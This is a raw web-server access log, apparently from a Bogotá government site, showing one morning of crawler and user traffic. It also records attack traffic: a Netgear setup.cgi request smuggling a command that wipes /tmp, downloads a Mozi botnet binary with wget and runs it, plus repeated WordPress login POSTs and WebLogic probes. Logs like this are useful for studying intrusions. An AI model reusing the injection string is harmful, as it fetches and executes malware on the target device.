172.22.2.4 - - [28/Dec/2022:04:49:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
114.119.143.68 - - [28/Dec/2022:04:51:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0944.pdf HTTP/1.1" 200 106616
114.119.151.237 - - [28/Dec/2022:04:52:12 -0500] "GET /BLA/resoluciones/AUTOS%202013/3588.pdf HTTP/1.1" 200 967908
40.77.167.25 - - [28/Dec/2022:04:52:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/2036.pdf HTTP/1.1" 200 689752
168.119.251.242 - - [28/Dec/2022:04:53:55 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/Dec/2022:04:53:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
201.245.192.253 - - [28/Dec/2022:04:54:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
216.245.221.92 - - [28/Dec/2022:04:55:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:04:54:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [28/Dec/2022:04:56:24 -0500] "-" 408 -
207.46.13.192 - - [28/Dec/2022:04:56:39 -0500] "GET /bla/resoluciones/notificaciones/autos%202019/1341.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/Dec/2022:04:55:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
205.210.31.164 - - [28/Dec/2022:04:57:15 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/Dec/2022:04:59:31 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
201.245.192.253 - - [28/Dec/2022:04:59:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:04:59:54 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [28/Dec/2022:04:59:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [28/Dec/2022:05:00:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [28/Dec/2022:05:00:16 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.245.221.92 - - [28/Dec/2022:05:00:33 -0500] "HEAD / HTTP/1.1" 200 -
114.119.147.58 - - [28/Dec/2022:05:00:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0386.pdf HTTP/1.1" 200 108242
172.22.2.4 - - [28/Dec/2022:04:59:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
172.22.2.4 - - [28/Dec/2022:05:00:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:00:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
201.245.192.253 - - [28/Dec/2022:05:04:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
216.245.221.92 - - [28/Dec/2022:05:05:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:05:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:06:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
185.180.143.141 - - [28/Dec/2022:05:08:58 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
185.180.143.141 - - [28/Dec/2022:05:09:29 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [28/Dec/2022:05:09:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
40.77.167.33 - - [28/Dec/2022:05:10:06 -0500] "GET /bla/resoluciones/notificaciones/registros%202018/0050.pdf HTTP/1.1" 304 -
114.119.135.132 - - [28/Dec/2022:05:10:21 -0500] "GET /autoliquidacion/index.php?dir=Solicitud%2Bde%2BClasificaci%C3%83%C2%83%C3%82%C2%AF%C3%83%C2%82%C3%82%C2%BF%C3%83%C2%82%C3%82%C2%BDn%2Bde%2BImpacto%2BAmbiental/&sort=name&order=desc HTTP/1.1" 200 6993
216.245.221.92 - - [28/Dec/2022:05:10:33 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.104 - - [28/Dec/2022:05:11:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [28/Dec/2022:05:11:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
114.119.159.92 - - [28/Dec/2022:05:11:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1133.pdf HTTP/1.1" 200 102868
190.216.133.34 - - [28/Dec/2022:05:12:08 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
190.216.133.34 - - [28/Dec/2022:05:12:08 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
190.216.133.34 - - [28/Dec/2022:05:12:08 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
190.216.133.34 - - [28/Dec/2022:05:12:08 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
190.216.133.34 - - [28/Dec/2022:05:12:08 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
190.216.133.34 - - [28/Dec/2022:05:12:09 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.216.133.34 - - [28/Dec/2022:05:12:16 -0500] "POST /appsia/controlador HTTP/1.1" 200 3600
190.216.133.34 - - [28/Dec/2022:05:12:16 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
190.216.133.34 - - [28/Dec/2022:05:12:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
114.119.129.237 - - [28/Dec/2022:05:13:11 -0500] "GET /BLA/resoluciones/AUTOS%202005/1369.pdf HTTP/1.1" 200 304353
172.22.2.4 - - [28/Dec/2022:05:11:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:12:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [28/Dec/2022:05:14:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
190.216.133.34 - - [28/Dec/2022:05:14:55 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
190.216.133.34 - - [28/Dec/2022:05:15:02 -0500] "POST /appsia/controlador HTTP/1.1" 200 9221
190.216.133.34 - - [28/Dec/2022:05:15:02 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
190.216.133.34 - - [28/Dec/2022:05:15:27 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
216.245.221.92 - - [28/Dec/2022:05:15:33 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.97 - - [28/Dec/2022:05:16:53 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:05:17:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:05:19:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
201.245.192.253 - - [28/Dec/2022:05:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44071
201.245.192.253 - - [28/Dec/2022:05:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41231
172.22.2.4 - - [28/Dec/2022:05:18:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
216.245.221.92 - - [28/Dec/2022:05:20:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.198 - - [28/Dec/2022:05:21:47 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12508
114.119.128.19 - - [28/Dec/2022:05:22:51 -0500] "GET /autoliquidacion/index.php?dir=Permiso%2Bde%2Bocupaci%C3%83%C2%AF%C3%82%C2%BF%C3%82%C2%BDn%2Bde%2Bcauce/&sort=name&order=asc HTTP/1.1" 200 6904
172.22.2.4 - - [28/Dec/2022:05:23:12 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 304 -
185.119.81.105 - - [28/Dec/2022:05:24:21 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [28/Dec/2022:05:24:22 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [28/Dec/2022:05:24:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
114.119.133.134 - - [28/Dec/2022:05:25:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3859.pdf HTTP/1.1" 200 1107634
216.245.221.92 - - [28/Dec/2022:05:26:34 -0500] "HEAD / HTTP/1.1" 200 -
114.119.158.203 - - [28/Dec/2022:05:26:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/5518.pdf HTTP/1.1" 200 150117
128.14.141.34 - - [28/Dec/2022:05:27:58 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [28/Dec/2022:05:29:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
201.245.192.253 - - [28/Dec/2022:05:29:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44071
201.245.192.253 - - [28/Dec/2022:05:30:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41231
216.245.221.92 - - [28/Dec/2022:05:31:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:30:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51643
172.22.2.4 - - [28/Dec/2022:05:32:05 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [28/Dec/2022:05:32:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [28/Dec/2022:05:30:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:31:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
201.245.192.253 - - [28/Dec/2022:05:34:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
216.245.221.92 - - [28/Dec/2022:05:36:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:36:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
80.78.25.11 - - [28/Dec/2022:05:38:29 -0500] "GET /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1018
66.249.73.100 - - [28/Dec/2022:05:38:30 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:05:38:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
172.22.2.4 - - [28/Dec/2022:05:37:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
114.119.146.126 - - [28/Dec/2022:05:39:09 -0500] "GET /BLA/resoluciones/AUTOS%202018/1345.pdf HTTP/1.1" 200 282116
201.245.192.253 - - [28/Dec/2022:05:39:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
201.245.192.253 - - [28/Dec/2022:05:39:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44071
201.245.192.253 - - [28/Dec/2022:05:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41231
114.119.136.148 - - [28/Dec/2022:05:40:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2851.pdf HTTP/1.1" 200 55312
216.245.221.92 - - [28/Dec/2022:05:41:33 -0500] "HEAD / HTTP/1.1" 200 -
114.119.148.191 - - [28/Dec/2022:05:41:53 -0500] "GET /Autoliquidacion/index.php?dir=Cobro%2BClasificacion%2BUso%2BDe%2BVivenda%2BEn%2BSuelo%2BRestringido/&sort=size&order=asc HTTP/1.1" 200 6949
128.14.209.162 - - [28/Dec/2022:05:42:16 -0500] "GET / HTTP/1.1" 200 319
185.119.81.97 - - [28/Dec/2022:05:43:10 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [28/Dec/2022:05:43:11 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [28/Dec/2022:05:42:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [28/Dec/2022:05:44:08 -0500] "-" 408 -
201.245.192.253 - - [28/Dec/2022:05:44:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:05:44:47 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
172.22.2.4 - - [28/Dec/2022:05:43:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
216.245.221.92 - - [28/Dec/2022:05:46:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:47:52 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [28/Dec/2022:05:47:52 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [28/Dec/2022:05:47:53 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [28/Dec/2022:05:47:53 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
114.119.155.50 - - [28/Dec/2022:05:49:06 -0500] "GET /BLA/resoluciones/AUTOS%202014/5276.pdf HTTP/1.1" 200 526018
201.245.192.253 - - [28/Dec/2022:05:49:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
66.249.73.127 - - [28/Dec/2022:05:49:51 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:05:48:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:49:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
185.119.81.97 - - [28/Dec/2022:05:51:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
216.245.221.92 - - [28/Dec/2022:05:51:33 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.97 - - [28/Dec/2022:05:51:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [28/Dec/2022:05:54:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
185.119.81.104 - - [28/Dec/2022:05:54:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [28/Dec/2022:05:54:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
66.249.73.127 - - [28/Dec/2022:05:55:32 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:05:54:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Dec/2022:05:56:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:54:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
173.252.127.19 - - [28/Dec/2022:05:57:27 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [28/Dec/2022:05:59:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
69.63.184.116 - - [28/Dec/2022:05:59:40 -0500] "GET /bogota-ya-cuenta-mas-de-70-negocios-verdes-verificados.html HTTP/1.1" 206 992
66.249.73.127 - - [28/Dec/2022:06:01:27 -0500] "-" 408 -
216.245.221.92 - - [28/Dec/2022:06:01:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:05:59:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:00:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [28/Dec/2022:06:04:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
206.189.0.60 - - [28/Dec/2022:06:05:27 -0500] "GET / HTTP/1.1" 200 319
206.189.0.60 - - [28/Dec/2022:06:05:27 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
114.119.152.143 - - [28/Dec/2022:06:05:35 -0500] "GET /BLA/resoluciones/AUTOS%202015/6475.pdf HTTP/1.1" 200 513118
178.33.182.68 - - [28/Dec/2022:06:06:13 -0500] "POST /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 2324
216.245.221.92 - - [28/Dec/2022:06:06:33 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [28/Dec/2022:06:07:06 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:06:05:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:06:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
201.245.192.253 - - [28/Dec/2022:06:09:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
47.254.16.187 - - [28/Dec/2022:06:09:26 -0500] "GET /Public/home/js/check.js HTTP/1.1" 404 1018
47.88.90.156 - - [28/Dec/2022:06:09:27 -0500] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 1018
216.245.221.92 - - [28/Dec/2022:06:11:33 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.172 - - [28/Dec/2022:06:12:31 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12508
172.22.2.4 - - [28/Dec/2022:06:11:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [28/Dec/2022:06:13:32 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:06:12:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53337
201.245.192.253 - - [28/Dec/2022:06:14:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:06:13:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
216.245.221.92 - - [28/Dec/2022:06:16:34 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:17:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:06:19:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
66.249.73.127 - - [28/Dec/2022:06:19:20 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:06:18:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
201.245.192.253 - - [28/Dec/2022:06:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44084
201.245.192.253 - - [28/Dec/2022:06:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41243
216.245.221.92 - - [28/Dec/2022:06:21:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:06:24:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
69.171.249.16 - - [28/Dec/2022:06:24:27 -0500] "GET /secretaria-de-ambiente-exalta-a-organizaciones-y-colectivos-en-conmemoracion-del-dia-del-voluntariado-ambiental.html HTTP/1.1" 206 1093
172.22.2.4 - - [28/Dec/2022:06:23:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [28/Dec/2022:06:25:13 -0500] "-" 408 -
172.22.2.4 - - [28/Dec/2022:06:24:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
173.252.107.18 - - [28/Dec/2022:06:26:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3964.pdf HTTP/1.1" 206 293557
216.245.221.92 - - [28/Dec/2022:06:26:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:06:29:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
201.245.192.253 - - [28/Dec/2022:06:29:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44084
201.245.192.253 - - [28/Dec/2022:06:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41243
121.206.165.62 - - [28/Dec/2022:06:30:38 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
172.22.2.4 - - [28/Dec/2022:06:29:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Dec/2022:06:31:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:29:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
66.249.73.127 - - [28/Dec/2022:06:31:37 -0500] "-" 408 -
114.119.134.230 - - [28/Dec/2022:06:32:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/0819.pdf HTTP/1.1" 200 433410
201.245.192.253 - - [28/Dec/2022:06:34:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:06:34:59 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 304 -
207.46.13.198 - - [28/Dec/2022:06:35:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20400-449.TIF HTTP/1.1" 200 9262392
216.245.221.92 - - [28/Dec/2022:06:36:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:34:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:35:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
66.249.73.127 - - [28/Dec/2022:06:38:04 -0500] "-" 408 -
201.245.192.253 - - [28/Dec/2022:06:39:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
201.245.192.253 - - [28/Dec/2022:06:39:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44084
201.245.192.253 - - [28/Dec/2022:06:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41243
216.245.221.92 - - [28/Dec/2022:06:41:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:40:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:41:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [28/Dec/2022:06:44:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
173.252.79.116 - - [28/Dec/2022:06:44:27 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [28/Dec/2022:06:46:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:46:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.136.199 - - [28/Dec/2022:06:48:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1869.pdf HTTP/1.1" 200 365781
45.155.126.211 - - [28/Dec/2022:06:48:57 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/Dec/2022:06:47:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [28/Dec/2022:06:49:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
66.249.73.127 - - [28/Dec/2022:06:49:17 -0500] "-" 408 -
114.119.151.233 - - [28/Dec/2022:06:50:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6798.pdf HTTP/1.1" 200 681634
216.245.221.92 - - [28/Dec/2022:06:51:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:06:53:09 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [28/Dec/2022:06:53:16 -0500] "GET /BLA/boletinlegal/laX7 HTTP/1.1" 404 1018
172.22.2.4 - - [28/Dec/2022:06:53:16 -0500] "GET /BLA/boletinlegal/IrTN HTTP/1.1" 404 1018
172.22.2.4 - - [28/Dec/2022:06:53:16 -0500] "GET /BLA/boletinlegal/aab8 HTTP/1.1" 404 1018
172.22.2.4 - - [28/Dec/2022:06:53:17 -0500] "GET /BLA/boletinlegal/jquery-3.3.1.slim.min.js HTTP/1.1" 404 1018
172.22.2.4 - - [28/Dec/2022:06:53:17 -0500] "GET /BLA/boletinlegal/aab9 HTTP/1.1" 404 1018
172.22.2.4 - - [28/Dec/2022:06:53:18 -0500] "GET /BLA/boletinlegal/jquery-3.3.2.slim.min.js HTTP/1.1" 404 1018
172.22.2.4 - - [28/Dec/2022:06:52:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:06:54:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:06:53:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
94.102.61.10 - - [28/Dec/2022:06:56:23 -0500] "GET /portaldeninos/ HTTP/1.1" 200 14393
216.245.221.92 - - [28/Dec/2022:06:56:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.198 - - [28/Dec/2022:06:58:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3872.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Dec/2022:06:59:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:06:58:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.79.2 - - [28/Dec/2022:07:00:27 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
172.22.2.4 - - [28/Dec/2022:06:59:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [28/Dec/2022:07:01:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Dec/2022:07:04:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
138.201.157.89 - - [28/Dec/2022:07:04:20 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/Dec/2022:07:04:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Dec/2022:07:06:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:04:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
40.77.167.25 - - [28/Dec/2022:07:07:51 -0500] "GET /BLA/resoluciones/AUTOS%202022/3646.pdf HTTP/1.1" 200 567866
201.245.192.253 - - [28/Dec/2022:07:09:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
173.252.83.117 - - [28/Dec/2022:07:09:31 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [28/Dec/2022:07:11:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:09:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Dec/2022:07:10:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
40.77.167.25 - - [28/Dec/2022:07:13:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202900-2915.tif HTTP/1.1" 200 1525102
201.245.192.253 - - [28/Dec/2022:07:14:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44193
172.22.2.4 - - [28/Dec/2022:07:14:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
144.22.137.236 - - [28/Dec/2022:07:14:32 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
144.22.137.236 - - [28/Dec/2022:07:14:33 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.154.33.200 - - [28/Dec/2022:07:14:33 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
186.154.33.200 - - [28/Dec/2022:07:14:59 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2013%2F HTTP/1.1" 200 238278
186.154.33.200 - - [28/Dec/2022:07:15:01 -0500] "GET /BLA/resoluciones/dlf/doc.gif HTTP/1.1" 200 1079
69.171.249.9 - - [28/Dec/2022:07:15:01 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
69.171.249.116 - - [28/Dec/2022:07:15:02 -0500] "GET /images/Musgo%20SDA%20(1)%20(1).png HTTP/1.1" 200 302122
